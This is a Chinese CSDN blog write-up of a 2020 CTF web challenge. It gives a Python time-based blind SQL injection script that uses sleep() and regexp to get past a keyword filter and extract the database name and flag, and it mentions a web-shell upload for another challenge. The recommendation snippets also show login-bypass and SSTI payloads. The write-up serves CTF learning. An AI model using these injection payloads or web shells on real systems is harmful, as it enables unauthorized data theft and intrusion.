2020新春战疫网络安全公益赛第一天之盲注

最新推荐文章于 2022-01-13 21:02:39 发布
最新推荐文章于 2022-01-13 21:02:39 发布
阅读量843 收藏
点赞数
分类专栏: CTF web安全 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/104436338
版权

0x00感觉自己还是太菜了

0x01爆破数据库名:

测试WAF过滤了=<>select

此处直接给出注数据库名的脚本:

def http_blindTime_get(url,payload):
    #记录发包时间
    starttime = time.time()
    result = requests.get(url+payload)
    #记录收包时间
    endtime = time.time()
    if(endtime-starttime<3):
        return False
    else:
        return True
#get方式获取数据库名,攻击载荷需修改函数变量构造
def getDatabaseName(url):
    #先获取数据库长度,推测不会长于16个字符,故range 0,10
    #逻辑为当数据库长度正确时使数据库休眠5秒,故当收发包时间差大于3s时break
    batabaselength = 0
    for i in range(0, 15):
        payload = "index.php?id=233333||if((length(database())%20regexp%20"+str(i)+"),sleep(5),2)"
        if http_blindTime_get(url,payload):
            databaselength = i
            break
    print('数据库名长度:',str(databaselength))
    if databaselength==0:
        return False
    else:
        #获取的数据库长度不为0,表明成功获取数据库长度,爆数据库名
        databasename=""
        for i in range(1,databaselength+1):
            for j in range(50, 128):
                payload = "index.php?id=23333||if((ascii(substr(database(),"+str(i)+",1))%20regexp%20"+str(j)+"),sleep(50),2)"
                if(http_blindTime_get(url, payload)):
                    print('找到code:'+str(j))
                    databasename += chr(j)
                    break
        print('数据库名:', str(databasename))
        return databasename

def main():
    url="http://36ca1c4d3df24bd3ae5e3b03df1f3379f351f0edfad943d4.changame.ichunqiu.com/"
    getDatabaseName(url)
    # get_all_databases("http://192.168.110.167/web/web26/")
if __name__ == '__main__':
    main()

运行上述代码根据时间盲注爆出数据库名为time。

接下来会发现select怎么都绕不过去,根据大佬们的解法,由于题目已经直接告诉我们flag在字段fl4g里面,则不需要再爆表名和字段名了,故直接用regexp绕过:

把payload换成payload = " if((substr((fl4g),i,1) regexp "+chr+"),sleep(3),1)"
#相当于 1 and if(fl4g = regexp 'flag{+ alphbat' ,sleep(5),1)

用这个payload,构建一个ascii表的alphbat逐个尝试flag就爆出来了

另外给出ezupload的wp:

直接是无过滤的文件上传,上传一句话之后找到根目录下有一个flag,直接执行命令 ./readflag就能拿到flag......

听说这道题是出题人翻车了。。。。。。。

KogRow
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020新春战疫网络安全公益解题记录
A1andNS's Blog
02-27 1110
2020新春战疫网络安全公益解题记录 圆满落幕的比,可惜我就会2题web,我有点不太行啊。 简单的招聘系统 在用户登录界面存在万能密码绕过漏洞,存在SQL注入漏洞。经过检验是字符型漏洞。 我还发现新注册用户会覆盖原来的用户,使用万能密码绕过时,默认登录最新注册的用户。 注册新用户后,发现不是第一用户,而是第二个。说明原来就有一个。Blank Page需要是admin登录才可以看见,新注册用...
2020新春网络安全公益-web-简单的招聘系统writeup
qq_41743240的博客
02-24 939
来到注册界面,先注册用户名为0密码为0的用户 然后发现登入解密可以通过万能密码登入 输入 0' or '1'='1 回显登入成功 输入 0' or '1'='2 回显登入失败 通过sql盲注入获取flag #coding:utf-8 import requests import urllib2 import urllib #先注册用户0密码也为0 url='http:/...
新春战疫公益(二)pwn
doudoudedi
02-23 809
第一天和第三天直接被爆锤 自己已经尽力了 武汉加油!!! borrowstack 就是基本的栈迁移 exp: from pwn import * from LibcSearcher import * #p=process('./borrowstack') p=remote('123.56.85.29',3635) elf=ELF('./borrowstack') libc=elf.libc bss...
2020新春战疫网络安全公益部分web writeup
st0ut的博客
02-25 1650
前言 最近因为情,在家里都没怎么出门,正好i春秋平台举办了2020新春战疫网络安全公益。学到了一些骚姿势,师傅们都tql了。。。 DAY1 简单的招聘系统 打开页面发现是一个登陆框,直接注册账号登陆进去。发现需要管理员登陆,才能解锁新功能。 在那里xss了半天,没有结果。。。。 最后重新回到登陆页面,使用万能密码登陆,发现能登进去,但是是我刚刚注册的账号,于是重新下发题目,,直接万能密码登陆,...
2020新春”—网络安全公益 -misc:code_in_morse附件.zip
02-21
2020新春”—网络安全公益 -misc:code_in_morse附件
2020新春快乐flash动画
07-24
标题中的“2020新春快乐flash动画”指的是一个以Flash技术制作的动画作品,主要目的是为了庆祝2020的春节。Flash是一种广泛应用于网络的多媒体平台,它允许开发者创建互动式的动画、游戏以及应用程序,尤其在...
2020新春背景矢量素材
07-25
本文将深入探讨“2020新春背景矢量素材”这一主题,涵盖其特点、用途、相关技术以及如何在设计项目中应用。 首先,矢量素材是指基于数学公式和路径描述的图像,它由点、线和曲线构成,能够无限放大而不会失真。...
2020新春祝福flash动画
07-24
标题“2020新春祝福flash动画”指的是一个用于庆祝2020中国新的交互式动画作品,它可能是由Adobe Flash软件创作的。Flash是一种流行的技术,曾广泛用于制作网页上的动态内容,如广告、游戏和多媒体交互设计。...
2020春秋杯新春网络安全公益——盲注
qq_34106499的博客
03-04 713
准备总结一下常见的sql注入及过滤,拿出这道题来回顾一下
2020新春”—网络安全公益 -misc:code_in_morse
qq_42016346的博客
02-22 1622
下载附件得到:out.pcapng 明显是流量分析,放到wireshark 照例搜索一波符串:flag.jpg.png等 看到tcp的一个有个12.jpg的包跟踪一下 可以看到是个post包,上传了一个12.jpg图片,内容为一串摩尔斯密码格式的数据,刚好符合题目,那应该是这没跑了 复制出来解密得到(http://www.all-tool.cn/Tools/morse/) 一串b...
i春秋 2020新春”大(web部分)
qq_42812036的博客
02-25 789
ezupload 上传一句话,蚁剑直连,bash直接cat /flag,说没权限折腾了下Linux提权,大马提权。 payload: cd / cat /readflag : ( 简单的招聘系统 payload admin' or 1# 进入admin,成功访问招聘界面blank page界面 key处存在sql注入 有5个字段,显位在2 可以猜测后端查询语句可能类似: selec...
长安“战疫网络安全卫士守护_crypto_复现
M3ng@L的博客
01-13 3760
长安“战疫网络安全卫士守护_Crypto math 涉及的知识点:RSA加密未知模数,已知p对q的逆元以及q对p的逆元求RSA的模数N 题目描述 题目没有描述,只有已知量c,e,d,pinvq,qinvp 公式推导 已知pinvq,qinvp求n,这样我们才能求得m=cd(mod n)m=c^d(mod~n)m=cd(mod n) 所谓pinvq也就是p∗pinvq≡1(mod q)p*pinvq\equiv 1(mod~q)p∗pinvq≡1(mod q) qi
re学习笔记(41)i春秋2020GYCTF-re-奇怪的安装包
逆向随笔
02-23 769
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目下载: 链接: https://pan.baidu.com/s/1N9NFUPITE9xcFCg7tnOPWw 提取码: 2020 压缩包,想到NSIS制作压缩包(其实没想到 然后使用7-zip打开Install.exe文件,查看[NSIS].nsi文件 找到判断的代码 Dialogs::InputBox 1 请输入ke...
2020新春战疫网络安全公益——MISC套娃
Broken_web的博客
02-22 1205
对于这个题,膜拜出题人的脑洞,废话不多说,上wp MISC套娃 第一层 打开1.txt 全是Ook 可知是Ook加密,可以得到第二层的密码 然后还有张唐僧的图片,用Hex editor分析,发现最后有一句话 第二层 这里面的压缩包可以直接爆破解开 然后隐藏part在连环画的备注里 第三层 里面的压缩包是伪加密,可以用7zip来直接解压 隐藏信息在图片里,LSB隐写 第四层 里面的压缩包是...
长安“战疫网络安全-wp
qq_45603443的博客
01-11 5313
长安“战疫网络安全-wpWebtpshiro?Baby_Uploadflag配送中心flaskRCE_No_ParaCryptono_can_no_bbmathLinearEquationsno_mah_no_cryno_cry_no_canMiscez_Encryptbinary西安加油Ez Steg八卦迷宫无字天书朴实无华的取证Reverselemoncombat_slogancute_dogehello_pyPwnpwn1重点来了 Web tp 文件上传+phar反序列化 <?php nam
高校战疫网络安全分享pwn复盘
doudoudedi
03-10 846
就做了一个pwn我tcl 但是收获很多 woodenbox2 这道题有先是用chunk overlop然后将unsortbin切割到fastbin(此时unsortbin与fastbin指向了同一个堆块)通过堆溢出将低位覆盖为stdout上面的位置然后写IO_FILE结构体leaklibc基址然后通过fastbin attack打malloc_hook即可 IO_FILE结构体的知识可看一下 h...
高校网络安全分享
辰星的博客
03-09 2862
2020情期间高校网络安全分享,个人做出的部分WP。不足之处见谅。 MISC 简单MISC 提示为简单隐写术。附件中一张jpg图片和一个名为flag.zip的加密压缩包,很明显是让我们利用jpg获得密码解压压缩包。 我们猜测这个图片中可能存在.txt文件保存密码,16进制查看器中查看下验证猜想。 在kali中利用binwalk分离出来,并查看 得到莫尔斯码,解码得到密码,解码压缩...
i春秋2020新春公益WEB复现Writeup
A_dmin的博客
02-24 3390
Day1 简单的招聘系统 ezupload babyphp 盲注 Day2 blacklist Ezsqli easysqli_copy Day3 Flaskapp easy_thinking ezExpress node_game
长安“战疫网络安全Writeup
Le1a's Blog
01-12 3826
Web RCE_No_Para 无参RCE ?1=system('tac flag.php');&code=eval(current(current(get_defined_vars()))); flask admin?static.js? 然后发现传参点:?name= 简单试了下SSTI,发现过滤了引号等符号 考虑attr结合16进制来绕过 {{a|attr(%27\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%27)|attr(%27\x5f\x5f\x62\x6
2020地产项目“庆禹新春货节暖场活动策划方案【房地产】【春节】.pptx
12-12
本次“庆禹新春货节暖场活动是为了在2020的春节期间,为天誉.智慧城的项目业主和意向客户提供一次丰富多彩的活动体验,增进业主和客户对项目的了解和信任,同时也为他们带来节日的喜庆氛围。活动将在2019...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值